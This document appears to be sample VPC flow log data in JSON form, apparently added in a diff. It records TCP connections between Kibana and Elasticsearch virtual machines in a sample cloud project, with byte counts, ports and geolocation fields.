+{"insertId":"y4wffpfk2erow","jsonPayload":{"bytes_sent":"64588","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33560},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"362","reporter":"SRC","rtt_msec":"11","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075859688Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2erot","jsonPayload":{"bytes_sent":"67315","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33536},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565156020Z","packets_sent":"354","reporter":"DEST","rtt_msec":"194","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150481417Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2eroq","jsonPayload":{"bytes_sent":"175633","connection":{"dest_ip":"10.87.40.76","dest_port":33576,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"67","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510464198Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2ero5","jsonPayload":{"bytes_sent":"116981","connection":{"dest_ip":"67.43.156.13","dest_port":33540,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789112562Z","packets_sent":"234","reporter":"SRC","rtt_msec":"313","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074813982Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2eroo","jsonPayload":{"bytes_sent":"67789","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33690},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:48.542406314Z","packets_sent":"344","reporter":"DEST","rtt_msec":"196","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075867049Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"ptjoddfhmrhg9","jsonPayload":{"bytes_sent":"136166","connection":{"dest_ip":"67.43.156.13","dest_port":33538,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565124617Z","packets_sent":"245","reporter":"SRC","rtt_msec":"250","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074952616Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} +{"insertId":"ptjoddfhmrhgh","jsonPayload":{"bytes_sent":"68262","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65257},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220614265Z","packets_sent":"718","reporter":"DEST","rtt_msec":"220","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.403388091Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} +{"insertId":"ptjoddfhmrhgj","jsonPayload":{"bytes_sent":"1457","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.14","src_port":52328},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:42:20.952481728Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:42:20.842840991Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} +{"insertId":"ptjoddfhmrhgr","jsonPayload":{"bytes_sent":"1460","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.14","src_port":59790},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:50.702194466Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:40:50.590894439Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} +{"insertId":"ptjoddfhmrhgn","jsonPayload":{"bytes_sent":"73681","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65317},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220599950Z","packets_sent":"728","reporter":"DEST","rtt_msec":"62","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.740491697Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} +{"insertId":"ptjoddfhmrhga","jsonPayload":{"bytes_sent":"92566","connection":{"dest_ip":"67.43.156.13","dest_port":65317,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220599950Z","packets_sent":"596","reporter":"SRC","rtt_msec":"62","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.740491697Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} +{"insertId":"ptjoddfhmrhgk","jsonPayload":{"bytes_sent":"66094","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33692},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565137912Z","packets_sent":"360","reporter":"DEST","rtt_msec":"181","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.558259934Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} +{"insertId":"ptjoddfhmrhgm","jsonPayload":{"bytes_sent":"4900","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65262},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220741828Z","packets_sent":"542","reporter":"DEST","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.251430011Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} +{"insertId":"ptjoddfhmrhgd","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"67.43.156.14","dest_port":52328,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:42:20.952481728Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:42:20.842840991Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} +{"insertId":"ptjoddfhmrhgl","jsonPayload":{"bytes_sent":"63280","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33552},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:55.213081491Z","packets_sent":"361","reporter":"DEST","rtt_msec":"21","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075957044Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} +{"insertId":"ptjoddfhmrhgi","jsonPayload":{"bytes_sent":"774029","connection":{"dest_ip":"67.43.156.14","dest_port":37292,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":24940,"city":"Bucharest","continent":"Europe","country":"rou","region":"Bucharest"},"end_time":"2019-06-14T03:49:35.841633589Z","packets_sent":"403","reporter":"SRC","rtt_msec":"102","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:35.048156283Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} +{"insertId":"ptjoddfhmrhgo","jsonPayload":{"bytes_sent":"359272","connection":{"dest_ip":"10.87.40.76","dest_port":33876,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933338264Z","packets_sent":"66","reporter":"DEST","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466706102Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} +{"insertId":"ptjoddfhmrhgp","jsonPayload":{"bytes_sent":"310476","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.14","src_port":37292},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:35.841633589Z","packets_sent":"214","reporter":"DEST","rtt_msec":"102","src_location":{"asn":24940,"city":"Bucharest","continent":"Europe","country":"rou","region":"Bucharest"},"start_time":"2019-06-14T03:40:35.048156283Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} +{"insertId":"ptjoddfhmrhg8","jsonPayload":{"bytes_sent":"1784","connection":{"dest_ip":"67.43.156.14","dest_port":59790,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:40:50.702194466Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:50.590894439Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} +{"insertId":"ptjoddfhmrhgf","jsonPayload":{"bytes_sent":"209716","connection":{"dest_ip":"67.43.156.13","dest_port":33552,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:55.213081491Z","packets_sent":"262","reporter":"SRC","rtt_msec":"21","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075957044Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} +{"insertId":"ptjoddfhmrhgg","jsonPayload":{"bytes_sent":"165643","connection":{"dest_ip":"67.43.156.13","dest_port":33556,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565214145Z","packets_sent":"256","reporter":"SRC","rtt_msec":"133","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:03.062674441Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} +{"insertId":"ptjoddfhmrhgb","jsonPayload":{"bytes_sent":"65890","connection":{"dest_ip":"67.43.156.13","dest_port":65257,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220614265Z","packets_sent":"593","reporter":"SRC","rtt_msec":"220","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.403388091Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} +{"insertId":"ptjoddfhmrhgs","jsonPayload":{"bytes_sent":"62620","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33538},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565124617Z","packets_sent":"358","reporter":"DEST","rtt_msec":"250","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074952616Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} +{"insertId":"ptjoddfhmrhge","jsonPayload":{"bytes_sent":"185520","connection":{"dest_ip":"67.43.156.13","dest_port":33692,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565137912Z","packets_sent":"249","reporter":"SRC","rtt_msec":"181","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.558259934Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} +{"insertId":"ptjoddfhmrhgc","jsonPayload":{"bytes_sent":"33269","connection":{"dest_ip":"67.43.156.13","dest_port":65262,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220741828Z","packets_sent":"517","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.251430011Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} +{"insertId":"ptjoddfhmrhg7","jsonPayload":{"bytes_sent":"58811","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33556},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565214145Z","packets_sent":"358","reporter":"DEST","rtt_msec":"133","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:03.062674441Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} +{"insertId":"ptjoddfhmrhgq","jsonPayload":{"bytes_sent":"5220","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33876},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933338264Z","packets_sent":"86","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466706102Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} +{"insertId":"bxuq05fhgmw9d","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"10.139.99.242","dest_port":22,"protocol":6,"src_ip":"67.43.156.14","src_port":41818},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:13.478093057Z","packets_sent":"4","reporter":"DEST","rtt_msec":"1350","src_location":{"asn":4837,"city":"Shangqiu","continent":"Asia","country":"chn","region":"Henan"},"start_time":"2019-06-14T03:40:11.031370298Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} 